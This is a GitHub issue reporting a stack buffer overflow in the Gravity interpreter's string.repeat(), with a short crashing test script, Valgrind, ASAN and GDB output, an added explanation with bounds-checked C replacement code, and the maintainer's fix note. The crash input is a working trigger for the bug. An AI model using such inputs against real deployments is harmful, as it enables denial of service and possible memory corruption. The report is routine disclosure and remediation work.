
Stack Overflow (String.repeat() \ strcpy) #131

Closed
r0t0tiller opened this issue Apr 10, 2017 · 1 comment


@r0t0tiller

There is a stack-based buffer overflow in the string_repeat() function in gravity_core.c. Using the test case below, an attacker can overflow the integers of .repeat() as well, and use the var to gain complete control of the program's memory. Attached is the Valgrind, ASAN, and GDB output. Would recommend not using strcpy or memcpy unless you can ensure that bounds are being checked on both the dest and src strings.

func main() {
    var a = "AAAAAAAAAAAAAAAAAAAAAAAA";
    a.repeat(100000000000000000);
    return a;
}

Valgrind:

==3080== Memcheck, a memory error detector
==3080== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==3080== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==3080== Command: ./gravity /home/ctf/Desktop/string.gravity
==3080==
==3080== Warning: client switching stacks? SP change: 0xffeffe970 --> 0xf0f866958
==3080== to suppress, use: --max-stackframe=4017717272 or greater
==3080== Invalid write of size 8
==3080== at 0x42375D: string_repeat (in /home/ctf/Desktop/Updated_Gravity/gravity/gravity)
==3080== Address 0xf0f866958 is on thread 1's stack
==3080==
==3080==
==3080== Process terminating with default action of signal 11 (SIGSEGV)
==3080== Access not within mapped region at address 0xF0F866958
==3080== at 0x42375D: string_repeat (in /home/ctf/Desktop/Updated_Gravity/gravity/gravity)
==3080== If you believe this happened as a result of a stack
==3080== overflow in your program's main thread (unlikely but
==3080== possible), you can try to increase the size of the
==3080== main thread stack using the --main-stacksize= flag.
==3080== The main thread stack size used in this run was 8388608.
==3080== Invalid write of size 8
==3080== at 0x4A28680: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so)
==3080== Address 0xf0f866950 is on thread 1's stack
==3080==
==3080==
==3080== Process terminating with default action of signal 11 (SIGSEGV)
==3080== Access not within mapped region at address 0xF0F866950
==3080== at 0x4A28680: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so)
==3080== If you believe this happened as a result of a stack
==3080== overflow in your program's main thread (unlikely but
==3080== possible), you can try to increase the size of the
==3080== main thread stack using the --main-stacksize= flag.
==3080== The main thread stack size used in this run was 8388608.
==3080==
==3080== HEAP SUMMARY:
==3080== in use at exit: 74,372 bytes in 1,029 blocks
==3080== total heap usage: 1,078 allocs, 49 frees, 78,648 bytes allocated
==3080==
==3080== LEAK SUMMARY:
==3080== definitely lost: 264 bytes in 6 blocks
==3080== indirectly lost: 1,384 bytes in 17 blocks
==3080== possibly lost: 0 bytes in 0 blocks
==3080== still reachable: 72,724 bytes in 1,006 blocks
==3080== suppressed: 0 bytes in 0 blocks
==3080== Rerun with --leak-check=full to see details of leaked memory
==3080==
==3080== For counts of detected and suppressed errors, rerun with: -v
==3080== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
Segmentation fault (core dumped)

ASAN:

ASAN:SIGSEGV

==3033==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd0a2a5418 (pc 0x00000042375d bp 0x7ffd2201e880 sp 0x7ffd0a2a5420 T0)
#0 0x42375c in string_repeat (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x42375c)
#1 0x41bbcb in gravity_vm_exec (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x41bbcb)
#2 0x41fc72 in gravity_vm_runmain (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x41fc72)
#3 0x401777 in main (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x401777)
#4 0x7f691a2a582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#5 0x401988 in _start (/home/ctf/Desktop/Updated_Gravity/gravity/gravity+0x401988)

SUMMARY: AddressSanitizer: stack-overflow ??:0 string_repeat

GDB:

[----------------------------------registers-----------------------------------]
RAX: 0xef798010
RBX: 0x0
RCX: 0xe8d4a51000
RDX: 0x2
RSI: 0x65d6e0 ('A' <repeats 15 times>...)
RDI: 0x7fff108649d0
RBP: 0x7fffffffda30 --> 0x6481d0 --> 0x64c610 --> 0x64a1d0 (0x000000000064a1d0)
RSP: 0x7fff108649d0
RIP: 0x42375d (<string_repeat+317>: call 0x401180 strcpy@plt)
R8 : 0x4
R9 : 0x655d10 --> 0x64a570 --> 0x64a1d0 (0x000000000064a1d0)
R10: 0x64b050 --> 0x64a1d0 (0x000000000064a1d0)
R11: 0x40 ('@')
R12: 0x648010 --> 0x6497b0 --> 0x1100000100
R13: 0x2
R14: 0x7fff108649d0
R15: 0x65d550 --> 0x64c610 --> 0x64a1d0 (0x000000000064a1d0)
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x423754 <string_repeat+308>: sub rsp,rax
0x423757 <string_repeat+311>: mov rdi,rsp
0x42375a <string_repeat+314>: mov r14,rsp
=> 0x42375d <string_repeat+317>: call 0x401180 strcpy@plt
0x423762 <string_repeat+322>: mov rcx,QWORD PTR [rbp-0x1048]
0x423769 <string_repeat+329>: lea rax,[rcx-0x1]
0x42376d <string_repeat+333>: cmp rcx,0x1
0x423771 <string_repeat+337>: mov QWORD PTR [rbp-0x1048],rax
Guessed arguments:
arg[0]: 0x7fff108649d0
arg[1]: 0x65d6e0 ('A' <repeats 15 times>...)
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x7fff108649d0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000042375d in string_repeat ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
[─────────────────────────────────────────────────────────────REGISTERS─────────────────────────────────────────────────────────────]
*RAX 0xef798010
RBX 0x0
*RCX 0xe8d4a51000
*RDX 0x2
*RDI 0x7fff108649d0
*RSI 0x65d6e0 ◂— 0x4141414141414141 ('AAAAAAAA')
*R8 0x4
*R9 0x655d10 —▸ 0x64a570 —▸ 0x64a1d0 ◂— 0x64a1d0
*R10 0x64b050 —▸ 0x64a1d0 ◂— 0x64a1d0
*R11 0x40
*R12 0x648010 —▸ 0x6497b0 ◂— 0x1100000100
*R13 0x2
*R14 0x7fff108649d0
*R15 0x65d550 —▸ 0x64c610 —▸ 0x64a1d0 ◂— 0x64a1d0
*RBP 0x7fffffffda30 —▸ 0x6481d0 —▸ 0x64c610 —▸ 0x64a1d0 ◂— ...
*RSP 0x7fff108649d0
*RIP 0x42375d (string_repeat+317) ◂— call 0x401180
[───────────────────────────────────────────────────────────────CODE────────────────────────────────────────────────────────────────]
► 0x42375d <string_repeat+317> call strcpy@plt <0x401180>
dest: 0x7fff108649d0
src: 0x65d6e0 ◂— 0x4141414141414141 ('AAAAAAAA')

0x423762 <string_repeat+322> mov rcx, qword ptr [rbp - 0x1048]
0x423769 <string_repeat+329> lea rax, [rcx - 1]
0x42376d <string_repeat+333> cmp rcx, 1
0x423771 <string_repeat+337> mov qword ptr [rbp - 0x1048], rax
0x423778 <string_repeat+344> je string_repeat+377 <0x423799>

0x42377a <string_repeat+346> nop word ptr [rax + rax]
0x423780 <string_repeat+352> mov rsi, qword ptr [r15 + 0x18]
0x423784 <string_repeat+356> mov rdi, r14
0x423787 <string_repeat+359> add rbx, 1
0x42378b <string_repeat+363> call strcat@plt <0x4013d0>
[───────────────────────────────────────────────────────────────STACK───────────────────────────────────────────────────────────────]
<Could not read memory at 0x7fff108649d0>
[─────────────────────────────────────────────────────────────BACKTRACE─────────────────────────────────────────────────────────────]
► f 0 42375d string_repeat+317
f 1 41bbcc gravity_vm_exec+19772
f 2 41fc73 gravity_vm_runmain+243
f 3 401778 main+744
f 4 7ffff751d830 __libc_start_main+240
Program received signal SIGSEGV (fault address 0x7fff108649c8)
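The disassembly above shows the shape of the defect: the frame is grown by a size derived from the repeat count (`sub rsp,rax`), then the source is written into it with `strcpy` followed by a `strcat` loop, with no check that the count times the string length fits in memory at all, let alone on the stack. The C code below is an added example, not Gravity's own code or the fix in commit 00e53c3; it shows a repeat implementation that validates the request before touching memory: it rejects negative counts, checks the `len * count` multiplication for overflow without computing it, caps the result at a policy limit, allocates on the heap, and copies with bounded `memcpy`. The names `repeat_size`, `string_repeat_safe` and the `REPEAT_MAX_BYTES` value are assumptions chosen for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Policy cap on the size of a repeated string (assumed value for this example). */
#define REPEAT_MAX_BYTES ((size_t)64 * 1024 * 1024)

typedef enum {
    REPEAT_OK,
    REPEAT_NEG_COUNT,   /* count < 0: no sensible result */
    REPEAT_OVERFLOW,    /* len * count does not fit in size_t */
    REPEAT_TOO_LARGE    /* fits in size_t, but exceeds REPEAT_MAX_BYTES */
} repeat_status;

/* Validate a repeat request before any memory is allocated or written.
 * On REPEAT_OK, *total (if non-NULL) receives len * count. */
repeat_status repeat_size(size_t len, int64_t count, size_t *total) {
    if (count < 0)
        return REPEAT_NEG_COUNT;
    /* Check the product without computing it: len * count must be <= SIZE_MAX.
     * This is the check the crashing code lacks; a wrapped product yields a
     * buffer far smaller than the bytes later copied into it. */
    if (len != 0 && (uint64_t)count > (uint64_t)(SIZE_MAX / len))
        return REPEAT_OVERFLOW;
    size_t product = len * (size_t)count;
    if (product > REPEAT_MAX_BYTES)
        return REPEAT_TOO_LARGE;
    if (total)
        *total = product;
    return REPEAT_OK;
}

/* Hypothetical safe repeat: returns a heap-allocated, NUL-terminated result,
 * or NULL if the request is rejected or malloc fails. Every write is a memcpy
 * of exactly len bytes at an offset repeat_size() has already proven to lie
 * inside the buffer, so no strcpy/strcat and no stack growth are involved. */
char *string_repeat_safe(const char *s, int64_t count) {
    if (s == NULL)
        return NULL;
    size_t len = strlen(s);
    size_t total;
    if (repeat_size(len, count, &total) != REPEAT_OK)
        return NULL;
    char *out = malloc(total + 1);   /* total <= cap, so +1 cannot wrap */
    if (out == NULL)
        return NULL;
    /* An empty source needs no copies regardless of count (avoids a huge no-op loop). */
    size_t reps = (len == 0) ? 0 : (size_t)count;
    for (size_t i = 0; i < reps; i++)
        memcpy(out + i * len, s, len);
    out[total] = '\0';
    return out;
}

int main(void) {
    /* The count from the report's test case, with a 24-byte source string. */
    int64_t huge = 100000000000000000LL;
    printf("status for len 24, count 1e17: %d (3 = too large)\n",
           repeat_size(24, huge, NULL));
    char *r = string_repeat_safe("ab", 3);
    printf("repeat(\"ab\", 3) = %s\n", r ? r : "(null)");
    free(r);
    return 0;
}
```

The order of the checks matters: the sign test comes first so the unsigned cast is safe, the division-based overflow test comes before the multiplication, and the policy cap is applied to the verified product. Even when the product does not wrap, as with the 24-byte string and count of 1e17 from the test case on a 64-bit build, the cap rejects it instead of asking the allocator (or the stack) for 2.4 exabytes.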

marcobambini added a commit that referenced this issue Apr 11, 2017
@marcobambini
Owner

I agree. Fixed by 00e53c3
